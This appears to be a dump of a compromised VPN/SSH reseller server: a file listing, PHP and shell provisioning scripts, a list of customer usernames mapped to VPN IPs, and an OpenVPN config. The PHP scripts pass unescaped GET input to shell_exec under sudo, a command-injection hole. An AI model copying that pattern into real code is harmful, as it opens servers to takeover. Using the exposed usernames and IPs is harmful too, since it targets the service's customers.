juden20060_OPENVPN.tgz +-rw-r--r-- 1 root root 3593 Nov 28 11:39 juegoray1353_OPENVPN.tgz +-rw-r--r-- 1 root root 3408 Nov 9 17:01 juicestin20280_OPENVPN.tgz +-rw-r--r-- 1 root root 3423 Nov 21 20:15 juliasutter2672_OPENVPN.tgz +-rw-r--r-- 1 root root 3420 Oct 24 18:42 kaiser6131_OPENVPN.tgz +-rw-r--r-- 1 root root 3561 Jul 16 01:38 
kaliber14521_OPENVPN.tgz +-rw-r--r-- 1 root root 3583 Dec 10 21:41 kalle4534_OPENVPN.tgz +-rw-r--r-- 1 root root 3619 Jul 8 2010 kdkdkd23140_OPENVPN.tgz +-rw-r--r-- 1 root root 3396 Dec 10 19:17 kevin4ual20601_OPENVPN.tgz +-rw-r--r-- 1 root root 3614 May 17 2010 keystyle14572_OPENVPN.tgz +-rw-r--r-- 1 root root 3397 Oct 22 02:19 kingding114185_OPENVPN.tgz +-rw-r--r-- 1 root root 3573 Dec 12 17:04 kingpok30006_OPENVPN.tgz +-rw-r--r-- 1 root root 3577 Oct 19 14:30 kirmi16980_OPENVPN.tgz +-rw-r--r-- 1 root root 3579 Sep 10 11:50 kirmi17897_OPENVPN.tgz +-rw-r--r-- 1 root root 3583 Aug 3 12:32 kirmi21804_OPENVPN.tgz +-rw-r--r-- 1 root root 3584 Dec 8 12:39 kirmi24669_OPENVPN.tgz +-rw-r--r-- 1 root root 3394 Jul 19 15:09 kitanamea14934_OPENVPN.tgz +-rw-r--r-- 1 root root 3564 Sep 13 20:16 klaudio18199_OPENVPN.tgz +-rw-r--r-- 1 root root 3572 Oct 13 23:44 knochen12287_OPENVPN.tgz +-rw-r--r-- 1 root root 3581 Aug 26 17:50 kobra25894_OPENVPN.tgz +-rw-r--r-- 1 root root 3584 Nov 11 19:06 kobra28854_OPENVPN.tgz +-rw-r--r-- 1 root root 3401 Sep 2 22:18 koksi13379157_OPENVPN.tgz +-rw-r--r-- 1 root root 3606 Sep 22 23:26 kollegah14227_OPENVPN.tgz +-rw-r--r-- 1 root root 3603 Nov 19 17:54 kollegah19696_OPENVPN.tgz +-rw-r--r-- 1 root root 3604 Jul 15 18:05 kollegah9876_OPENVPN.tgz +-rw-r--r-- 1 root root 3412 Jul 21 15:55 kopfnuss1233390_OPENVPN.tgz +-rw-r--r-- 1 root root 3578 Nov 30 09:05 kstARRR29974_OPENVPN.tgz +-rw-r--r-- 1 root root 3416 Dec 15 15:22 lacezl11349_OPENVPN.tgz +-rw-r--r-- 1 root root 3572 Jul 15 14:07 lafesse135_OPENVPN.tgz +-rw-r--r-- 1 root root 3573 Jul 17 21:19 larusso24610_OPENVPN.tgz +-rw-r--r-- 1 root root 3605 Dec 10 05:07 latestnews13082_OPENVPN.tgz +-rw-r--r-- 1 root root 3603 Oct 30 07:58 latestnews14060_OPENVPN.tgz +-rw-r--r-- 1 root root 3418 May 15 2010 letharg30647_OPENVPN.tgz +-rw-r--r-- 1 root root 3601 Jul 20 01:31 levision22813_OPENVPN.tgz +-rw-r--r-- 1 root root 3595 Jul 19 01:07 levision26609_OPENVPN.tgz +drwxr-xr-x 2 root root 4096 Sep 17 
03:05 lighttpd +-rw-r--r-- 1 root root 3621 May 14 2010 lilg9427854_OPENVPN.tgz +-rw-r--r-- 1 root root 3570 Jul 29 03:31 lolilol5992_OPENVPN.tgz +-rw-r--r-- 1 root root 3589 Oct 1 00:06 loopi2628_OPENVPN.tgz +-rw-r--r-- 1 root root 3599 Sep 5 22:47 lorenzstyler30043_OPENVPN.tgz +-rw-r--r-- 1 root root 3588 Sep 9 15:14 lpboy15438_OPENVPN.tgz +-rw-r--r-- 1 root root 3584 Nov 28 11:20 lpboy32147_OPENVPN.tgz +-rw-r--r-- 1 root root 3583 Dec 21 20:30 luden29299_OPENVPN.tgz +-rw-r--r-- 1 root root 3608 Jul 11 17:42 lykantos5842_OPENVPN.tgz +-rw-r--r-- 1 root root 3605 Dec 2 11:04 mablutze15734_OPENVPN.tgz +-rw-r--r-- 1 root root 3614 Jan 2 11:48 mablutze20061_OPENVPN.tgz +-rw-r--r-- 1 root root 3618 Jul 2 2010 maddin9319817_OPENVPN.tgz +-rw-r--r-- 1 root root 3582 Nov 1 16:20 makko10328_OPENVPN.tgz +-rw-r--r-- 1 root root 3585 Aug 13 22:07 makko15206_OPENVPN.tgz +-rw-r--r-- 1 root root 3616 Jun 12 2010 makko27543_OPENVPN.tgz +-rw-r--r-- 1 root root 3606 Dec 19 12:10 malakas23496_OPENVPN.tgz +-rw-r--r-- 1 root root 3402 Oct 26 03:21 malakas32654_OPENVPN.tgz +-rw-r--r-- 1 root root 3570 Dec 5 13:21 malikop20421_OPENVPN.tgz +-rw-r--r-- 1 root root 3602 Aug 8 02:15 mani199323876_OPENVPN.tgz +-rw-r--r-- 1 root root 3577 Jul 13 00:29 maury27248_OPENVPN.tgz +-rw-r--r-- 1 root root 3582 Aug 20 18:57 mcott19555_OPENVPN.tgz +-rw-r--r-- 1 root root 3572 Oct 6 18:19 mcott7073_OPENVPN.tgz +-rw-r--r-- 1 root root 3587 Jul 13 11:39 mcott9631_OPENVPN.tgz +-rw-r--r-- 1 root root 3566 Aug 25 06:39 mesrine15658_OPENVPN.tgz +-rw-r--r-- 1 root root 3576 Oct 12 18:34 micki2219130_OPENVPN.tgz +-rw-r--r-- 1 root root 3583 Oct 4 19:37 mieze25868_OPENVPN.tgz +-rw-r--r-- 1 root root 3604 Jul 30 23:15 mrfranzi20317_OPENVPN.tgz +-rw-r--r-- 1 root root 3583 Jul 18 22:23 murth934_OPENVPN.tgz +-rw-r--r-- 1 root root 3405 Oct 17 04:31 muruk20094696_OPENVPN.tgz +-rw-r--r-- 1 root root 3611 Dec 17 13:08 muschigirl23085_OPENVPN.tgz +-rw-r--r-- 1 root root 3609 Sep 22 12:38 muschigirl28807_OPENVPN.tgz 
+-rw-r--r-- 1 root root 3570 Oct 4 22:31 n1C3A1r22801_OPENVPN.tgz +-rw-r--r-- 1 root root 3607 Nov 26 13:10 n3ot0xin7144_OPENVPN.tgz +-rw-r--r-- 1 root root 3409 Dec 21 21:57 nate2331513_OPENVPN.tgz +-rw-r--r-- 1 root root 3615 Jun 8 2010 navyraiser2256_OPENVPN.tgz +-rw-r--r-- 1 root root 3585 Aug 25 00:32 nemiz8610_OPENVPN.tgz +-rw-r--r-- 1 root root 3635 Jun 9 2010 nightmar330255_OPENVPN.tgz +-rw-r--r-- 1 root root 3621 Jul 11 18:06 numo874898_OPENVPN.tgz +-rw-r--r-- 1 root root 3592 Dec 2 14:11 obama12323355_OPENVPN.tgz +-rw-r--r-- 1 root root 3613 Jun 11 2010 obama12325666_OPENVPN.tgz +-rw-r--r-- 1 root root 3601 Oct 15 20:31 obama12325914_OPENVPN.tgz +-rw-r--r-- 1 root root 3420 Dec 19 18:26 oicw913539_OPENVPN.tgz +-rw-r--r-- 1 root root 3565 Aug 11 00:48 oxford123948_OPENVPN.tgz +-rw-r--r-- 1 root root 3629 Jun 2 2010 p0rt3m22208_OPENVPN.tgz +-rw-r--r-- 1 root root 3411 Nov 5 01:41 pURRRR806_OPENVPN.tgz +-rw-r--r-- 1 root root 3583 Dec 6 07:28 pan1c17070_OPENVPN.tgz +-rw-r--r-- 1 root root 3593 Oct 26 10:28 pan1c31582_OPENVPN.tgz +-rw-r--r-- 1 root root 3609 May 25 2010 pann021887_OPENVPN.tgz +-rw-r--r-- 1 root root 3406 Dec 7 22:03 papa421249_OPENVPN.tgz +-rw-r--r-- 1 root root 3432 Jun 14 2010 paranoy21693_OPENVPN.tgz +-rw-r--r-- 1 root root 3415 Dec 1 18:16 peters7031_OPENVPN.tgz +-rw-r--r-- 1 root root 3618 Jun 8 2010 plu5554340_OPENVPN.tgz +-rw-r--r-- 1 root root 3613 Jun 15 2010 powerarm9390_OPENVPN.tgz +-rw-r--r-- 1 root root 3408 Jul 16 00:19 puttin29618_OPENVPN.tgz +-rw-r--r-- 1 root root 3575 Nov 22 18:53 r0fLyyy20540_OPENVPN.tgz +-rw-r--r-- 1 root root 3601 Jul 20 20:45 recoilcontrol13838_OPENVPN.tgz +-rw-r--r-- 1 root root 3601 Oct 31 05:55 recoilcontrol14436_OPENVPN.tgz +-rw-r--r-- 1 root root 3605 Jul 20 23:48 recoilcontrol16539_OPENVPN.tgz +-rw-r--r-- 1 root root 3589 Jul 20 20:45 recoilcontrol20256_OPENVPN.tgz +-rw-r--r-- 1 root root 3595 Aug 24 23:41 recoilcontrol20435_OPENVPN.tgz +-rw-r--r-- 1 root root 3595 Sep 25 22:59 
recoilcontrol22600_OPENVPN.tgz +-rw-r--r-- 1 root root 3602 Dec 10 06:48 recoilcontrol24867_OPENVPN.tgz +-rw-r--r-- 1 root root 3578 Dec 7 12:24 reideen31055_OPENVPN.tgz +-rw-r--r-- 1 root root 3565 Oct 27 16:49 reideen4694_OPENVPN.tgz +-rw-r--r-- 1 root root 3429 Jun 13 2010 rew133711075_OPENVPN.tgz +-rw-r--r-- 1 root root 3406 Dec 4 15:25 rich9024721_OPENVPN.tgz +-rw-r--r-- 1 root root 3586 Dec 19 15:48 ripit25423_OPENVPN.tgz +-rw-r--r-- 1 root root 3392 Sep 25 15:40 romulus8910580_OPENVPN.tgz +-rw-r--r-- 1 root root 3606 Jun 5 2010 s1cks1ck7058_OPENVPN.tgz +-rw-r--r-- 1 root root 3425 Jun 27 2010 saidone3692_OPENVPN.tgz +-rw-r--r-- 1 root root 3432 Jul 10 10:52 santaly22171_OPENVPN.tgz +-rw-r--r-- 1 root root 3428 May 12 2010 schmali30094_OPENVPN.tgz +-rw-r--r-- 1 root root 3421 Jul 5 2010 schmali8853_OPENVPN.tgz +-rw-r--r-- 1 root root 3589 Nov 15 21:35 sh0ck11639_OPENVPN.tgz +-rw-r--r-- 1 root root 3571 Nov 1 01:54 shitpro46_OPENVPN.tgz +-rw-r--r-- 1 root root 3604 Aug 26 22:09 shizomitzu29204_OPENVPN.tgz +-rw-r--r-- 1 root root 3586 Dec 3 09:02 shore17470_OPENVPN.tgz +-rw-r--r-- 1 root root 3407 Dec 7 14:34 sidosido1233174_OPENVPN.tgz +-rw-r--r-- 1 root root 3613 Jul 22 20:39 sirmaliq9030397_OPENVPN.tgz +-rw-r--r-- 1 root root 3407 Dec 2 07:36 slic3menic38769_OPENVPN.tgz +-rw-r--r-- 1 root root 3411 Nov 10 22:47 snowghost17906_OPENVPN.tgz +-rw-r--r-- 1 root root 3561 Nov 28 08:57 someone1895_OPENVPN.tgz +-rw-r--r-- 1 root root 3434 Jun 25 2010 someone22369_OPENVPN.tgz +-rw-r--r-- 1 root root 3593 Aug 4 23:47 souliloquist11153_OPENVPN.tgz +-rw-r--r-- 1 root root 3423 Jul 4 2010 souliloquist12695_OPENVPN.tgz +-rw-r--r-- 1 root root 3594 Aug 4 23:48 souliloquist25034_OPENVPN.tgz +-rw-r--r-- 1 root root 3586 Nov 8 03:26 spran32726_OPENVPN.tgz +-rw-r--r-- 1 root root 30730 Jan 7 19:07 sshCreateLog +-rw-r--r-- 1 root root 3579 Aug 15 01:11 st0ne24184_OPENVPN.tgz +-rw-r--r-- 1 root root 3573 Oct 31 00:13 stage666761_OPENVPN.tgz +-rw-r--r-- 1 root root 3409 Aug 2 
21:41 stevy265130526_OPENVPN.tgz +-rw-r--r-- 1 root root 3568 Oct 14 22:12 store2410563_OPENVPN.tgz +-rw-r--r-- 1 root root 3600 Sep 7 14:57 stronger8718968_OPENVPN.tgz +-rw-r--r-- 1 root root 3419 Oct 4 01:35 styler12729_OPENVPN.tgz +-rw-r--r-- 1 root root 3421 Nov 28 15:10 styles16225_OPENVPN.tgz +-rw-r--r-- 1 root root 3424 Oct 18 07:43 styles18650_OPENVPN.tgz +-rw-r--r-- 1 root root 3604 Sep 29 17:37 suc4life19475_OPENVPN.tgz +-rw-r--r-- 1 root root 3597 Aug 24 20:28 suc4life9834_OPENVPN.tgz +-rw-r--r-- 1 root root 3625 Jun 20 2010 sudeki25957_OPENVPN.tgz +-rw-r--r-- 1 root root 3572 Dec 23 13:58 sunrise20870_OPENVPN.tgz +-rw-r--r-- 1 root root 3401 Nov 29 12:31 supersixten16431_OPENVPN.tgz +-rw-r--r-- 1 root root 3582 Nov 8 19:05 t0xus32177_OPENVPN.tgz +-rw-r--r-- 1 root root 3590 Sep 2 23:25 t0xus6444_OPENVPN.tgz +-rw-r--r-- 1 root root 3400 Nov 24 21:34 tahBOUNTY24202_OPENVPN.tgz +-rw-r--r-- 1 root root 3590 Nov 12 19:12 tanjo21492_OPENVPN.tgz +-rw-r--r-- 1 root root 3576 Sep 9 18:20 tanjo28945_OPENVPN.tgz +-rw-r--r-- 1 root root 3564 Nov 27 10:06 termate24530_OPENVPN.tgz +-rw-r--r-- 1 root root 4 Sep 16 23:51 test +-rw-r--r-- 1 root root 3575 Dec 5 09:06 test5699246_OPENVPN.tgz +-rw-r--r-- 1 root root 3587 Dec 29 19:18 teste8025_OPENVPN.tgz +-rw-r--r-- 1 root root 3623 Jun 11 2010 th3sh4dow15637_OPENVPN.tgz +-rw-r--r-- 1 root root 3412 Aug 29 03:36 th3sh4dow26538_OPENVPN.tgz +-rw-r--r-- 1 root root 3404 Jul 29 01:36 th3sh4dow7901_OPENVPN.tgz +-rw-r--r-- 1 root root 3427 Nov 1 18:55 theDog31533_OPENVPN.tgz +-rw-r--r-- 1 root root 3620 May 17 2010 theaSh5027_OPENVPN.tgz +-rw-r--r-- 1 root root 3421 Jan 3 20:24 thehen8300_OPENVPN.tgz +-rw-r--r-- 1 root root 3401 Nov 29 06:13 tijgertje12595_OPENVPN.tgz +-rw-r--r-- 1 root root 3608 May 13 2010 traden9010098_OPENVPN.tgz +-rw-r--r-- 1 root root 3418 Nov 8 02:41 tripit30242_OPENVPN.tgz +-rw-r--r-- 1 root root 3612 Oct 21 03:49 turboprinz18543_OPENVPN.tgz +-rw-r--r-- 1 root root 3579 Oct 19 23:35 
twist2275_OPENVPN.tgz +-rw-r--r-- 1 root root 3430 May 31 2010 ucitsme12769_OPENVPN.tgz +-rw-r--r-- 1 root root 3610 Nov 24 22:52 ultrawilli21542_OPENVPN.tgz +-rw-r--r-- 1 root root 3609 Oct 15 00:46 upperfreak1495_OPENVPN.tgz +-rw-r--r-- 1 root root 3575 Jul 14 13:30 vpn2420339_OPENVPN.tgz +-rw-r--r-- 1 root root 3580 Nov 3 20:57 vpn2429681_OPENVPN.tgz +-rw-r--r-- 1 root root 22174 Jan 4 20:31 vpnCreateLog +-rw-r--r-- 1 root root 3591 Nov 10 04:35 w333d21697_OPENVPN.tgz +-rw-r--r-- 1 root root 3586 Nov 6 03:41 w333d26767_OPENVPN.tgz +-rw-r--r-- 1 root root 3586 Oct 22 01:09 w333d31139_OPENVPN.tgz +-rw-r--r-- 1 root root 3579 Sep 22 02:05 w333d4383_OPENVPN.tgz +-rw-r--r-- 1 root root 3599 May 11 2010 w333d8639_OPENVPN.tgz +-rw-r--r-- 1 root root 3579 Dec 4 09:33 w333d9676_OPENVPN.tgz +-rw-r--r-- 1 root root 3620 Jun 11 2010 war10ck133710772_OPENVPN.tgz +-rw-r--r-- 1 root root 3435 Aug 20 16:41 warmachine133724023_OPENVPN.tgz +-rw-r--r-- 1 root root 3406 Sep 3 04:18 weedneger31561_OPENVPN.tgz +-rw-r--r-- 1 root root 3418 Dec 5 08:42 weeman8818_OPENVPN.tgz +-rw-r--r-- 1 root root 3433 Jun 16 2010 werther15618_OPENVPN.tgz +-rw-r--r-- 1 root root 3591 Nov 23 19:41 winkel722094_OPENVPN.tgz +-rw-r--r-- 1 root root 3600 Aug 3 16:02 winkelmann725337_OPENVPN.tgz +-rw-r--r-- 1 root root 3585 Aug 15 16:31 woorm6760_OPENVPN.tgz +-rw-r--r-- 1 root root 3603 Oct 23 04:28 wortermilk31260_OPENVPN.tgz +-rw-r--r-- 1 root root 3597 Dec 13 19:34 wtfvpn2417141_OPENVPN.tgz +-rw-r--r-- 1 root root 3419 Aug 27 04:03 ww2dd28375_OPENVPN.tgz +-rw-r--r-- 1 root root 3580 Oct 15 16:33 x220x7914_OPENVPN.tgz +-rw-r--r-- 1 root root 3567 Dec 16 07:03 xStream14196_OPENVPN.tgz +-rw-r--r-- 1 root root 3572 Nov 9 01:51 xStream25123_OPENVPN.tgz +-rw-r--r-- 1 root root 3569 Sep 30 15:38 xStream27135_OPENVPN.tgz +-rw-r--r-- 1 root root 3425 Jul 8 2010 xStream9518_OPENVPN.tgz +-rw-r--r-- 1 root root 3575 Aug 18 03:10 xStream9635_OPENVPN.tgz +-rw-r--r-- 1 root root 3573 Sep 17 01:50 
xeqtion7314_OPENVPN.tgz +-rw-r--r-- 1 root root 3601 Nov 27 14:45 xx1337xx4652_OPENVPN.tgz +-rw-r--r-- 1 root root 3608 Sep 9 21:16 xxkev200xx24744_OPENVPN.tgz +-rw-r--r-- 1 root root 3412 Jul 17 07:25 zer00063_OPENVPN.tgz +-rw-r--r-- 1 root root 3638 May 15 2010 zetinator10057_OPENVPN.tgz + +# ls -la | grep -v tgz +total 2388 +drwxr-xr-x 3 root root 36864 Jan 4 20:32 . +drwxr-xr-x 14 root root 4096 Feb 2 2010 .. +-rw------- 1 root root 1024 Jan 4 20:17 .rnd +-rw-r--r-- 1 root root 387 Sep 17 00:14 addSSHuser.php +-rw-r--r-- 1 root root 280 Sep 17 00:14 addVPNuser.php +-rwsr-sr-x 1 root root 700 May 9 2010 createSSHsocks.sh +-rwsr-sr-x 1 root root 518 May 11 2010 createVPN.sh +-rw-r--r-- 1 root root 3 May 11 2010 index.htm +-rw-r--r-- 1 root root 2 Sep 17 03:05 index.html +drwxr-xr-x 2 root root 4096 Sep 17 03:05 lighttpd +-rw-r--r-- 1 root root 30730 Jan 7 19:07 sshCreateLog +-rw-r--r-- 1 root root 4 Sep 16 23:51 test +-rw-r--r-- 1 root root 22174 Jan 4 20:31 vpnCreateLog + +# #Warning: dumb code ahead +# cat addSSHuser.php +<?php + if($_SERVER['REMOTE_ADDR'] != "92.241.190.157" ) die("<h2>404 File not found</h2>"); + // visudo www-data ALL=NOPASSWD: /var/www/createSSHsocks.sh + + if(isset($_GET['user']) && isset($_GET['pass']) && isset($_GET['date'])) + { + $user = $_GET['user']; + $pass = $_GET['pass']; + $date = $_GET['date']; + + echo shell_exec("sudo /var/www/createSSHsocks.sh $user $pass $date"); + } + +?> + +# cat createSSHsocks.sh +#!/bin/sh + +if [ $# -lt 3 ] +then + echo $0 user pass expDate + exit +fi + +if ! echo $1 | grep -q -e "^[a-zA-Z0-9]*$" +then + echo "Invalid User" + exit +fi +if ! echo $2 | grep -q -e "^[a-zA-Z0-9]*$" +then + echo "Invalid Pass" + exit +fi +if ! echo $3 | grep -q -E "[0-9]{4}-[0-9]{2}-[0-9]{2}" +then + echo "Invalid ExpDate" + exit +fi + +user=$1 +pass=$2 +exp=$3 + +echo "`date`: $user $pass $date" >> sshCreateLog + +if [ ! 
-d /home/SSHUSER ] +then + echo "Creating /home/SSHUSER" + mkdir /home/SSHUSER +fi + +crpass=$(perl -e"`echo \"print crypt(\\\"$pass\\\", \\\"itsMySalt\\\")\"`") +deluser $user +useradd --home /home/SSHUSER --expiredate $exp --password $crpass --shell /usr/sbin/nologin $user + +$ cat addVPNuser.php +<?php + if($_SERVER['REMOTE_ADDR'] != "92.241.190.157" ) die("<h2>404 File not found</h2>"); + // visudo www-data ALL=NOPASSWD: /var/www/createVPN.sh + + if(isset($_GET['user'])) + { + $user = $_GET['user']; + echo shell_exec("sudo /var/www/createVPN.sh $user 2> /dev/null"); + } + +?> + +# cat createVPN.sh +#!/bin/sh + +if [ $# -lt 1 ] +then + echo $0 user + exit +fi + +if ! echo $1 | grep -q -e "^[a-zA-Z0-9]*$" +then + echo "Invalid User" + exit +fi + +user=$1 +dir=`pwd` + +echo "`date`: $user" >> vpnCreateLog + +cd /etc/openvpn/easy-rsa/2.0 #MAD AES-1024 RIGHT HEEEERE +source ./vars >> /dev/null 2> /dev/null +./build-key --batch $user >> /dev/null 2> /dev/null + +fn=`echo "${user}${RANDOM}_OPENVPN.tgz"` + +cd keys/ +sed -e "s/_NAME_/$user/g" client.conf > ${user}_OVPN.ovpn +tar cfz $fn $user.crt $user.key ca.crt ${user}_OVPN.ovpn +mv $fn /var/www/ +cd $dir +echo $fn + +# cd /etc/openvpn/ && ls -la +total 48 +drwxr-xr-x 4 root root 4096 Sep 17 03:20 . +drwxr-xr-x 70 root root 4096 Jan 7 19:07 .. 
+drwxr-xr-x 2 root root 4096 May 9 2010 certs +-rw-r--r-- 1 root root 3427 May 9 2010 client.conf +drwxr-xr-x 4 root root 4096 May 9 2010 easy-rsa +-rw------- 1 root root 1187 Jan 7 21:44 ipp.txt +---------- 1 root root 356 May 12 2010 openvpn-status.log +---------- 1 root root 160 May 18 2010 openvpn.log +-rw-r--r-- 1 root root 10388 Aug 9 23:09 server.conf +-rw------- 1 root root 0 May 18 2010 status.log +-rwxr-xr-x 1 root root 1352 Sep 18 2008 update-resolv-conf + +# cat ipp.txt +Dukeraider,10.8.0.4 +WEEDtwo,10.8.0.8 +elektro,10.8.0.12 +21Kms,10.8.0.16 +darkt0wn,10.8.0.20 +hi,10.8.0.24 +w333d,10.8.0.28 +SleepyHollow,10.8.0.32 +HonigMelone,10.8.0.36 +SmileNike,10.8.0.40 +becks,10.8.0.44 +sunrise,10.8.0.48 +papa42,10.8.0.52 +malakas2,10.8.0.56 +Fahne,10.8.0.60 +freshestman,10.8.0.64 +kobra,10.8.0.68 +Thunder0,10.8.0.72 +juden,10.8.0.76 +b7231,10.8.0.80 +mablutze,10.8.0.84 +Kerber0s,10.8.0.88 +Loader,10.8.0.92 +latestnews,10.8.0.96 +Sa1nt8564,10.8.0.100 +SilverFox,10.8.0.104 +nate23,10.8.0.108 +pan1c,10.8.0.112 +Ginal406,10.8.0.116 +Mantis70,10.8.0.120 +kstARRR,10.8.0.124 +h3l0x,10.8.0.128 +reideen,10.8.0.132 +conviction,10.8.0.136 +awesome,10.8.0.140 +recoilcontrol,10.8.0.144 +jack123,10.8.0.148 +chiller1337,10.8.0.152 +hung2304,10.8.0.156 +Tiberius,10.8.0.160 +Kolumbus,10.8.0.164 +Delphinko,10.8.0.168 +McKnad,10.8.0.172 +Kamill,10.8.0.176 +kevin4ual,10.8.0.180 +SleepyHollow,10.8.0.184 +N3v10,10.8.0.188 +shore,10.8.0.192 +kingpok,10.8.0.196 +xStream,10.8.0.200 +Kasanova,10.8.0.204 +andreas7411,10.8.0.208 +slic3menic3,10.8.0.212 +FaxXer,10.8.0.216 +Pitbull69,10.8.0.220 +b1111,10.8.0.224 +obama123,10.8.0.228 +Alanka,10.8.0.232 +oicw91,10.8.0.236 +weeman,10.8.0.240 +fuckdawn,10.8.0.244 +docscanner,10.8.0.248 + +# cat server.conf +################################################# +# Sample OpenVPN 2.0 config file for # +# multi-client server. # +# # +# This file is for the server side # +# of a many-clients <-> one-server # +# OpenVPN configuration. 
# +# # +# OpenVPN also supports # +# single-machine <-> single-machine # +# configurations (See the Examples page # +# on the web site for more info). # +# # +# This config should work on Windows # +# or Linux/BSD systems. Remember on # +# Windows to quote pathnames and use # +# double backslashes, e.g.: # +# "C:\\Program Files\\OpenVPN\\config\\foo.key" # +# # +# Comments are preceded with '#' or ';' # +################################################# + +# Which local IP address should OpenVPN +# listen on? (optional) +;local a.b.c.d + +# Which TCP/UDP port should OpenVPN listen on? +# If you want to run multiple OpenVPN instances +# on the same machine, use a different port +# number for each one. You will need to +# open up this port on your firewall. +port 1194 + +# TCP or UDP server? +;proto tcp +proto udp + +# "dev tun" will create a routed IP tunnel, +# "dev tap" will create an ethernet tunnel. +# Use "dev tap0" if you are ethernet bridging +# and have precreated a tap0 virtual interface +# and bridged it with your ethernet interface. +# If you want to control access policies +# over the VPN, you must create firewall +# rules for the the TUN/TAP interface. +# On non-Windows systems, you can give +# an explicit unit number, such as tun0. +# On Windows, use "dev-node" for this. +# On most systems, the VPN will not function +# unless you partially or fully disable +# the firewall for the TUN/TAP interface. +;dev tap +dev tun + +# Windows needs the TAP-Win32 adapter name +# from the Network Connections panel if you +# have more than one. On XP SP2 or higher, +# you may need to selectively disable the +# Windows firewall for the TAP adapter. +# Non-Windows systems usually don't need this. +;dev-node MyTap + +# SSL/TLS root certificate (ca), certificate +# (cert), and private key (key). Each client +# and the server must have their own cert and +# key file. The server and all clients will +# use the same ca file. 
+# +# See the "easy-rsa" directory for a series +# of scripts for generating RSA certificates +# and private keys. Remember to use +# a unique Common Name for the server +# and each of the client certificates. +# +# Any X509 key management system can be used. +# OpenVPN can also use a PKCS #12 formatted key file +# (see "pkcs12" directive in man page). +ca certs/ca.crt +cert certs/server.crt +key certs/server.key # This file should be kept secret + +# Diffie hellman parameters. +# Generate your own with: +# openssl dhparam -out dh1024.pem 1024 +# Substitute 2048 for 1024 if you are using +# 2048 bit keys. +dh certs/dh1024.pem + +# Configure server mode and supply a VPN subnet +# for OpenVPN to draw client addresses from. +# The server will take 10.8.0.1 for itself, +# the rest will be made available to clients. +# Each client will be able to reach the server +# on 10.8.0.1. Comment this line out if you are +# ethernet bridging. See the man page for more info. +server 10.8.0.0 255.255.255.0 + +# Maintain a record of client <-> virtual IP address +# associations in this file. If OpenVPN goes down or +# is restarted, reconnecting clients can be assigned +# the same virtual IP address from the pool that was +# previously assigned. +ifconfig-pool-persist ipp.txt + +# Configure server mode for ethernet bridging. +# You must first use your OS's bridging capability +# to bridge the TAP interface with the ethernet +# NIC interface. Then you must manually set the +# IP/netmask on the bridge interface, here we +# assume 10.8.0.4/255.255.255.0. Finally we +# must set aside an IP range in this subnet +# (start=10.8.0.50 end=10.8.0.100) to allocate +# to connecting clients. Leave this line commented +# out unless you are ethernet bridging. 
+;server-bridge 10.8.0.4 255.255.255.0 10.8.0.50 10.8.0.100 + +# Configure server mode for ethernet bridging +# using a DHCP-proxy, where clients talk +# to the OpenVPN server-side DHCP server +# to receive their IP address allocation +# and DNS server addresses. You must first use +# your OS's bridging capability to bridge the TAP +# interface with the ethernet NIC interface. +# Note: this mode only works on clients (such as +# Windows), where the client-side TAP adapter is +# bound to a DHCP client. +;server-bridge + +# Push routes to the client to allow it +# to reach other private subnets behind +# the server. Remember that these +# private subnets will also need +# to know to route the OpenVPN client +# address pool (10.8.0.0/255.255.255.0) +# back to the OpenVPN server. +;push "route 192.168.10.0 255.255.255.0" +;push "route 192.168.20.0 255.255.255.0" + +# To assign specific IP addresses to specific +# clients or if a connecting client has a private +# subnet behind it that should also have VPN access, +# use the subdirectory "ccd" for client-specific +# configuration files (see man page for more info). + +# EXAMPLE: Suppose the client +# having the certificate common name "Thelonious" +# also has a small subnet behind his connecting +# machine, such as 192.168.40.128/255.255.255.248. +# First, uncomment out these lines: +;client-config-dir ccd +;route 192.168.40.128 255.255.255.248 +# Then create a file ccd/Thelonious with this line: +# iroute 192.168.40.128 255.255.255.248 +# This will allow Thelonious' private subnet to +# access the VPN. This example will only work +# if you are routing, not bridging, i.e. you are +# using "dev tun" and "server" directives. + +# EXAMPLE: Suppose you want to give +# Thelonious a fixed VPN IP address of 10.9.0.1. 
+# First uncomment out these lines: +;client-config-dir ccd +;route 10.9.0.0 255.255.255.252 +# Then add this line to ccd/Thelonious: +# ifconfig-push 10.9.0.1 10.9.0.2 + +# Suppose that you want to enable different +# firewall access policies for different groups +# of clients. There are two methods: +# (1) Run multiple OpenVPN daemons, one for each +# group, and firewall the TUN/TAP interface +# for each group/daemon appropriately. +# (2) (Advanced) Create a script to dynamically +# modify the firewall in response to access +# from different clients. See man +# page for more info on learn-address script. +;learn-address ./script + +# If enabled, this directive will configure +# all clients to redirect their default +# network gateway through the VPN, causing +# all IP traffic such as web browsing and +# and DNS lookups to go through the VPN +# (The OpenVPN server machine may need to NAT +# or bridge the TUN/TAP interface to the internet +# in order for this to work properly). +push "redirect-gateway def1" +push "dhcp-option DNS 92.241.168.201" + +# Certain Windows-specific network settings +# can be pushed to clients, such as DNS +# or WINS server addresses. CAVEAT: +# http://openvpn.net/faq.html#dhcpcaveats +# The addresses below refer to the public +# DNS servers provided by opendns.com. +;push "dhcp-option DNS 208.67.222.222" +;push "dhcp-option DNS 208.67.220.220" + +# Uncomment this directive to allow different +# clients to be able to "see" each other. +# By default, clients will only see the server. +# To force clients to only see the server, you +# will also need to appropriately firewall the +# server's TUN/TAP interface. +;client-to-client + +# Uncomment this directive if multiple clients +# might connect with the same certificate/key +# files or common names. This is recommended +# only for testing purposes. For production use, +# each client should have its own certificate/key +# pair. 
+# +# IF YOU HAVE NOT GENERATED INDIVIDUAL +# CERTIFICATE/KEY PAIRS FOR EACH CLIENT, +# EACH HAVING ITS OWN UNIQUE "COMMON NAME", +# UNCOMMENT THIS LINE OUT. +;duplicate-cn + +# The keepalive directive causes ping-like +# messages to be sent back and forth over +# the link so that each side knows when +# the other side has gone down. +# Ping every 10 seconds, assume that remote +# peer is down if no ping received during +# a 120 second time period. +keepalive 10 120 + +# For extra security beyond that provided +# by SSL/TLS, create an "HMAC firewall" +# to help block DoS attacks and UDP port flooding. +# +# Generate with: +# openvpn --genkey --secret ta.key +# +# The server and each client must have +# a copy of this key. +# The second parameter should be '0' +# on the server and '1' on the clients. +;tls-auth ta.key 0 # This file is secret + +# Select a cryptographic cipher. +# This config item must be copied to +# the client config file as well. +;cipher BF-CBC # Blowfish (default) +;cipher AES-128-CBC # AES +;cipher DES-EDE3-CBC # Triple-DES + +# Enable compression on the VPN link. +# If you enable it here, you must also +# enable it in the client config file. +comp-lzo + +# The maximum number of concurrently connected +# clients we want to allow. +;max-clients 100 + +# It's a good idea to reduce the OpenVPN +# daemon's privileges after initialization. 